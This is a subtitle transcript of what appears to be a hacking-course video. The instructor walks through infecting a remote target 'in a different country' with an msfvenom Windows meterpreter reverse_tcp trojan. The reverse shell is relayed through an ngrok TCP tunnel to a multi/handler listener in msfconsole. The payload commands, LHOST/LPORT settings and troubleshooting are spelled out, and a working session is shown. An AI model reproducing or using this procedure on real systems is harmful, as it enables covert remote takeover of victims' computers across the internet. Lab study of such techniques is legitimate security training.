1 00:00:00,240 --> 00:00:02,310 Instructor: Hello and welcome back. 2 00:00:02,310 --> 00:00:05,550 All of this time we only infected devices 3 00:00:05,550 --> 00:00:08,490 that were on our local network. 4 00:00:08,490 --> 00:00:10,440 But what if there is a person 5 00:00:10,440 --> 00:00:12,330 or a target in a different country 6 00:00:12,330 --> 00:00:14,760 that we want to infect with our payload? 7 00:00:14,760 --> 00:00:16,620 How can we do that? 8 00:00:16,620 --> 00:00:18,990 Well, we're going to see right now 9 00:00:18,990 --> 00:00:21,690 as you already mentioned at the end of the previous video, 10 00:00:21,690 --> 00:00:23,700 there are two different ways. 11 00:00:23,700 --> 00:00:26,670 There is a way of port forwarding on a router 12 00:00:26,670 --> 00:00:28,650 and I'm not going to show that right now 13 00:00:28,650 --> 00:00:30,300 because that would require you 14 00:00:30,300 --> 00:00:32,580 to have the access to the router 15 00:00:32,580 --> 00:00:34,080 and every router is different 16 00:00:34,080 --> 00:00:36,241 so the settings for the port forwarding 17 00:00:36,241 --> 00:00:40,110 could actually be completely different for you and me, 18 00:00:40,110 --> 00:00:43,440 but this method which is a method using a tool 19 00:00:43,440 --> 00:00:46,200 called ngrok, works on any network 20 00:00:46,200 --> 00:00:49,080 you do not have to have the access to your router 21 00:00:49,080 --> 00:00:50,760 You can just run this tool 22 00:00:50,760 --> 00:00:54,660 and you can hack a device on a completely different network 23 00:00:54,660 --> 00:00:57,120 in a completely different country. 24 00:00:57,120 --> 00:00:58,680 Let's see how we can do that. 25 00:00:58,680 --> 00:01:00,720 So the first thing that I want you to do 26 00:01:00,720 --> 00:01:02,670 is I want you to open your Google Chrome 27 00:01:02,670 --> 00:01:05,850 and type ngrok in your search bar. 28 00:01:05,850 --> 00:01:09,090 Once you do that, you should see this link and ngrok.com. 29 00:01:09,090 --> 00:01:13,350 Click on it, and it'll ask you to create an online account 30 00:01:13,350 --> 00:01:15,330 and this is something that you must do 31 00:01:15,330 --> 00:01:17,400 in order for this to work. 32 00:01:17,400 --> 00:01:20,010 So just go and sign up, create the account 33 00:01:20,010 --> 00:01:21,560 and once you create the account 34 00:01:22,860 --> 00:01:24,960 it'll lead you to this page right here 35 00:01:24,960 --> 00:01:27,880 where you will have the option to download the ngrok tool 36 00:01:28,740 --> 00:01:32,100 and you will also have three different steps 37 00:01:32,100 --> 00:01:35,250 as to how you can install and run the tool. 38 00:01:35,250 --> 00:01:38,763 So the first step is to download the ngrok and unzip it. 39 00:01:39,600 --> 00:01:41,280 We want to download it for Linux 40 00:01:41,280 --> 00:01:42,480 as we are running Kali Linux 41 00:01:42,480 --> 00:01:45,240 so I'm just going to go and save the file. 42 00:01:45,240 --> 00:01:47,310 Now all of the steps I already did, 43 00:01:47,310 --> 00:01:49,050 once you navigate to the downloads, 44 00:01:49,050 --> 00:01:51,990 you will have the ngok stable.zip file 45 00:01:51,990 --> 00:01:53,460 and you will notice I have two of them 46 00:01:53,460 --> 00:01:54,810 because as I mentioned, 47 00:01:54,810 --> 00:01:57,330 this is something that I already did. 48 00:01:57,330 --> 00:01:58,560 The next thing that you want to do 49 00:01:58,560 --> 00:02:01,050 is you want to move this file to your desktop 50 00:02:01,050 --> 00:02:03,753 and you want to run this command right here. 51 00:02:04,830 --> 00:02:07,620 Once run it, you want to connect it to your account 52 00:02:07,620 --> 00:02:10,530 by running the command under the step number two 53 00:02:10,530 --> 00:02:12,690 and that is the entire installation. 54 00:02:12,690 --> 00:02:14,613 After that, you will be good to go. 55 00:02:15,540 --> 00:02:19,323 So let's go back to our terminal and see how ngrok works. 56 00:02:20,400 --> 00:02:22,800 You have this file which you downloaded, 57 00:02:22,800 --> 00:02:25,440 you unzipped it and you got this file. 58 00:02:25,440 --> 00:02:27,480 This is the ngrok executable. 59 00:02:27,480 --> 00:02:32,140 In order to run this, we can type ./ngrok 60 00:02:32,140 --> 00:02:35,640 and after it we want to specify what port 61 00:02:35,640 --> 00:02:38,250 we want to port forward to their servers. 62 00:02:38,250 --> 00:02:41,130 They work similarly as port forwarding to the router. 63 00:02:41,130 --> 00:02:43,350 Just this time we're using their servers 64 00:02:43,350 --> 00:02:46,350 in order to perform the port forwarding. 65 00:02:46,350 --> 00:02:48,690 However, with the free version of ngrok 66 00:02:48,690 --> 00:02:52,530 the port might change every time you restart the tool. 67 00:02:52,530 --> 00:02:54,420 If you get the paid version of ngrok 68 00:02:54,420 --> 00:02:57,060 then I believe you can get a port forwarded 69 00:02:57,060 --> 00:02:59,370 which will be the same every time 70 00:02:59,370 --> 00:03:01,530 but we're going to go with the free version right now. 71 00:03:01,530 --> 00:03:06,360 So we can just type ./ngrok and we want to type tcp, 72 00:03:06,360 --> 00:03:07,560 which stands for the connection. 73 00:03:07,560 --> 00:03:09,690 We want to initiate a TCP connection 74 00:03:09,690 --> 00:03:13,200 and let's forward port 5555. 75 00:03:13,200 --> 00:03:14,760 This is the command that we want to run 76 00:03:14,760 --> 00:03:16,590 in order to run ngrok. 77 00:03:16,590 --> 00:03:18,633 Once you do that, press enter, 78 00:03:21,450 --> 00:03:23,910 and it'll start the tool. 79 00:03:23,910 --> 00:03:25,830 If it says session status online 80 00:03:25,830 --> 00:03:28,860 that means everything is working under the account. 81 00:03:28,860 --> 00:03:31,890 You will see your username, which you created 82 00:03:31,890 --> 00:03:33,480 once creating the online account. 83 00:03:33,480 --> 00:03:35,010 We can see the version of ngrok. 84 00:03:35,010 --> 00:03:37,830 We can see the region to where the port forwarded us 85 00:03:37,830 --> 00:03:41,460 and here is their server that they're using to 86 00:03:41,460 --> 00:03:43,860 port forward our port. 87 00:03:43,860 --> 00:03:46,020 This is the website or the link 88 00:03:46,020 --> 00:03:50,520 and this is the port that we want our targets to connect to. 89 00:03:50,520 --> 00:03:52,230 I know this might look confusing 90 00:03:52,230 --> 00:03:55,410 but just stick with me for a moment right now. 91 00:03:55,410 --> 00:03:57,630 So we got our ngrok tool ready. 92 00:03:57,630 --> 00:03:59,850 Now let's create our payload. 93 00:03:59,850 --> 00:04:02,485 I will zoom this in end, 94 00:04:02,485 --> 00:04:05,970 I'm going to navigate to the desktop. 95 00:04:05,970 --> 00:04:07,620 Great. 96 00:04:07,620 --> 00:04:10,110 There are two things that differentiate 97 00:04:10,110 --> 00:04:12,690 once creating a payload for the local area network 98 00:04:12,690 --> 00:04:14,220 and once creating a payload 99 00:04:14,220 --> 00:04:17,579 for a different network with the ngrok tool. 100 00:04:17,579 --> 00:04:19,709 And those two things are local host 101 00:04:19,709 --> 00:04:22,503 and local port that the target connects to. 102 00:04:23,880 --> 00:04:27,300 But before we even do that, what I want you to do is 103 00:04:27,300 --> 00:04:29,760 I want you to copy this link right here 104 00:04:29,760 --> 00:04:32,310 from the slashes up to the two dots. 105 00:04:32,310 --> 00:04:36,960 So 2.tcp.angrok.io, for you this might be a different link 106 00:04:36,960 --> 00:04:39,243 but I want you to copy only this part, 107 00:04:42,090 --> 00:04:43,470 Copy selection 108 00:04:43,470 --> 00:04:46,380 and I want you to run the command host 109 00:04:46,380 --> 00:04:49,023 and then paste this link. 110 00:04:50,490 --> 00:04:53,940 This host tool will give us the IP address of this link. 111 00:04:53,940 --> 00:04:58,940 So it tells us this link has address 3.138.45.170 112 00:05:01,050 --> 00:05:02,790 and this is the IP address 113 00:05:02,790 --> 00:05:06,483 that you will use as a local host for your payload creation. 114 00:05:07,320 --> 00:05:11,070 So let's go and type msfvenom -p. 115 00:05:11,070 --> 00:05:12,720 And for this video, 116 00:05:12,720 --> 00:05:14,760 we don't really need to attack an Android device. 117 00:05:14,760 --> 00:05:16,200 We are going to attack windows. 118 00:05:16,200 --> 00:05:17,280 It doesn't really matter. 119 00:05:17,280 --> 00:05:19,470 It'll work on both of those devices. 120 00:05:19,470 --> 00:05:20,550 So I'm just going to go with 121 00:05:20,550 --> 00:05:25,055 Windows/x64/meterpreter/reverse_tcp 122 00:05:25,055 --> 00:05:29,400 and I'm using X 64 because I'm attacking a 64-bit Windows 123 00:05:29,400 --> 00:05:31,080 you can adapt your payload 124 00:05:31,080 --> 00:05:32,670 to the machine that you're attacking, 125 00:05:32,670 --> 00:05:37,670 and after it we set the L host to be this IP address. 126 00:05:37,890 --> 00:05:39,300 Paste the selection, 127 00:05:39,300 --> 00:05:41,700 and the L port remember I also said that 128 00:05:41,700 --> 00:05:45,180 the L port is different, in this command. 129 00:05:45,180 --> 00:05:50,003 The L port is going to be this port right here, so 16722. 130 00:05:51,150 --> 00:05:54,990 For you once again, this port will probably be different. 131 00:05:54,990 --> 00:05:59,970 I'm going to copy it and I'm going to paste it right here 132 00:05:59,970 --> 00:06:03,250 and the output can be shell.exe 133 00:06:04,140 --> 00:06:05,970 I'll press enter, 134 00:06:05,970 --> 00:06:09,930 and in just a few seconds we have our payload ready. 135 00:06:09,930 --> 00:06:14,930 Now I'm just going to go and lower both of these terminals 136 00:06:15,660 --> 00:06:17,970 and I'm going to paste it 137 00:06:17,970 --> 00:06:21,843 or paste the payload onto my Windows 10 desktop. 138 00:06:22,740 --> 00:06:24,810 Here it is, but before I run it, 139 00:06:24,810 --> 00:06:29,400 of course I have to set up my MSF console listener, 140 00:06:29,400 --> 00:06:33,420 so I'm just going to go and enter MSF console. 141 00:06:33,420 --> 00:06:34,800 But you will notice that, 142 00:06:34,800 --> 00:06:39,000 as the local host and local port inside the MSF console 143 00:06:39,000 --> 00:06:41,850 we're not going to be using these two things. 144 00:06:41,850 --> 00:06:45,060 This IP address from this link and this port right here. 145 00:06:45,060 --> 00:06:48,120 We only use them for our payload creation 146 00:06:48,120 --> 00:06:51,210 in the MSF console we want to specify this. 147 00:06:51,210 --> 00:06:53,520 We want to specify the local host to be the host 148 00:06:53,520 --> 00:06:55,658 that we are listening for the incoming connections 149 00:06:55,658 --> 00:07:00,658 and port 5555 to be the local port that is also listening 150 00:07:00,690 --> 00:07:02,970 for the incoming connections. 151 00:07:02,970 --> 00:07:04,020 So let's go right here. 152 00:07:04,020 --> 00:07:07,150 First of all, we're going to use exploit multi handler 153 00:07:10,050 --> 00:07:12,750 Set the payload to the payload that you generated 154 00:07:12,750 --> 00:07:15,450 in case you're testing this on an Android device 155 00:07:15,450 --> 00:07:18,090 make sure you select the correct payload 156 00:07:18,090 --> 00:07:23,090 and the L host is going to be the IP address of 0.0.0.0 157 00:07:23,760 --> 00:07:28,020 which means we are listening on any interface whatsoever. 158 00:07:28,020 --> 00:07:32,460 You should also select and type right here 0.0.0.0 159 00:07:32,460 --> 00:07:34,235 and under the L port you want to 160 00:07:34,235 --> 00:07:36,600 type the port that you forwarded. 161 00:07:36,600 --> 00:07:38,820 In my case, it is 5555, 162 00:07:38,820 --> 00:07:41,523 so I'm going to type set L port 5555. 163 00:07:44,070 --> 00:07:47,700 Once you do this, you want to type run. 164 00:07:47,700 --> 00:07:50,520 It'll start listening for the connections 165 00:07:50,520 --> 00:07:54,600 on 0.0.0.0 on the port that you forwarded. 166 00:07:54,600 --> 00:07:57,363 And if I go right here and run this, 167 00:07:59,640 --> 00:08:03,180 for some reason it says this app cannot run on Windows. 168 00:08:03,180 --> 00:08:07,470 Let's see what the problem is. 169 00:08:07,470 --> 00:08:11,670 Hmm, it could be that x64 is presenting a problem 170 00:08:11,670 --> 00:08:14,670 for some reason, so we're just going to create 171 00:08:14,670 --> 00:08:17,040 another payload real quick. 172 00:08:17,040 --> 00:08:20,850 It might misconfigure something once I pasted it 173 00:08:20,850 --> 00:08:23,130 from the Kali Linux to the desktop, 174 00:08:23,130 --> 00:08:27,090 but nonetheless let's remove the current, shell.exe 175 00:08:27,090 --> 00:08:31,937 and let's run the previous command real fast. 176 00:08:31,937 --> 00:08:35,400 First thing is I need an IP address 177 00:08:35,400 --> 00:08:36,720 from this link right here 178 00:08:36,720 --> 00:08:40,080 so I'm just going to copy it once again 179 00:08:40,080 --> 00:08:44,820 and I'm going to type host and then paste this. 180 00:08:44,820 --> 00:08:47,340 Okay, once we get the IP address 181 00:08:47,340 --> 00:08:50,580 then we want to create payload, so msfvenom-p 182 00:08:50,580 --> 00:08:53,760 and let's just use the regular meterpreter payload 183 00:08:53,760 --> 00:08:56,460 which I don't believe this was an issue, but just in case. 184 00:08:56,460 --> 00:08:58,350 Let's go with the regular payload. 185 00:08:58,350 --> 00:09:02,253 L Host is going to be equal to this IP address. 186 00:09:06,720 --> 00:09:11,720 L port is going to be equal to 1 6 7 7 22 187 00:09:12,600 --> 00:09:15,960 which remember it is this port number right here 188 00:09:15,960 --> 00:09:19,050 and let's also add -f to be an exe 189 00:09:19,050 --> 00:09:21,630 just so we can specify that this is an exe file 190 00:09:21,630 --> 00:09:23,985 for some reason maybe this presented as a problem 191 00:09:23,985 --> 00:09:26,310 once we copied it to the desktop. 192 00:09:26,310 --> 00:09:30,210 And the output is going to be test.exe 193 00:09:30,210 --> 00:09:32,460 and let's just wait for this to finish. 194 00:09:32,460 --> 00:09:34,560 Okay, now it gives a different size. 195 00:09:34,560 --> 00:09:36,660 It could be that it was a problem 196 00:09:36,660 --> 00:09:39,480 because it didn't specify -f.exe. 197 00:09:39,480 --> 00:09:44,480 Nonetheless, let's go and copy the payload onto the desktop. 198 00:09:47,400 --> 00:09:52,400 Let's go and open the msfconsole and let's run the Trojan. 199 00:09:54,300 --> 00:09:57,360 Go back to Kali Linux, and here it is. 200 00:09:57,360 --> 00:10:00,000 We got the meterpreter session one opened 201 00:10:00,000 --> 00:10:02,530 from the local host on the target machine 202 00:10:03,480 --> 00:10:05,280 but it does tell us right here 203 00:10:05,280 --> 00:10:07,890 that the meterpreter session one died and that is because 204 00:10:07,890 --> 00:10:10,230 we actually misconfigured the payload right here 205 00:10:10,230 --> 00:10:13,530 since we set it up for the previous payload that didn't work 206 00:10:13,530 --> 00:10:16,440 therefore, it has this X 64 207 00:10:16,440 --> 00:10:18,090 just so we can make sure everything works. 208 00:10:18,090 --> 00:10:19,860 I'm going to set the payload to be 209 00:10:19,860 --> 00:10:24,860 Windows/meterpreter/reverse_tcp. 210 00:10:26,460 --> 00:10:28,260 Show options, 211 00:10:28,260 --> 00:10:30,000 Everything else is already set. 212 00:10:30,000 --> 00:10:31,950 Let's run the listener once again 213 00:10:31,950 --> 00:10:34,860 and let's run the payload once again 214 00:10:34,860 --> 00:10:37,110 and right now everything works. 215 00:10:37,110 --> 00:10:39,990 We got the meterpreter session to open 216 00:10:39,990 --> 00:10:42,460 and we can run all of the commands 217 00:10:43,440 --> 00:10:45,630 the tower meterpreter gives us. 218 00:10:45,630 --> 00:10:46,500 Awesome. 219 00:10:46,500 --> 00:10:50,130 Now, this attack will work on any device in the world 220 00:10:50,130 --> 00:10:52,110 because they're not really connecting 221 00:10:52,110 --> 00:10:53,940 straight to our machine. 222 00:10:53,940 --> 00:10:58,440 They're connecting to this link right here, and to this port 223 00:10:58,440 --> 00:11:00,420 and what ngrok is doing for us 224 00:11:00,420 --> 00:11:04,200 is it is forwarding their connection back to our machine 225 00:11:04,200 --> 00:11:06,750 on the local host, and on this port. 226 00:11:06,750 --> 00:11:08,640 That's why in the MSF console 227 00:11:08,640 --> 00:11:11,970 we are listening on this port and on the local host. 228 00:11:11,970 --> 00:11:13,470 While in the payload creation 229 00:11:13,470 --> 00:11:17,070 we specify that the target should connect right here. 230 00:11:17,070 --> 00:11:18,750 Then they forward the connection 231 00:11:18,750 --> 00:11:23,490 and we get our meterpreter session opened. 232 00:11:23,490 --> 00:11:27,693 And from there we can execute all of the commands as usual. 233 00:11:29,250 --> 00:11:30,083 Awesome. 234 00:11:30,083 --> 00:11:32,160 Now, let me know if you also want me to show you 235 00:11:32,160 --> 00:11:34,740 the port forwarding, how it looks on my router, 236 00:11:34,740 --> 00:11:36,360 in case you want to see that. 237 00:11:36,360 --> 00:11:38,610 But nonetheless, this is the best way 238 00:11:38,610 --> 00:11:40,680 that you can actually perform port forwarding 239 00:11:40,680 --> 00:11:43,650 without needing an access to the router. 240 00:11:43,650 --> 00:11:44,483 Thank you for watching 241 00:11:44,483 --> 00:11:46,443 and I will see you in the next video.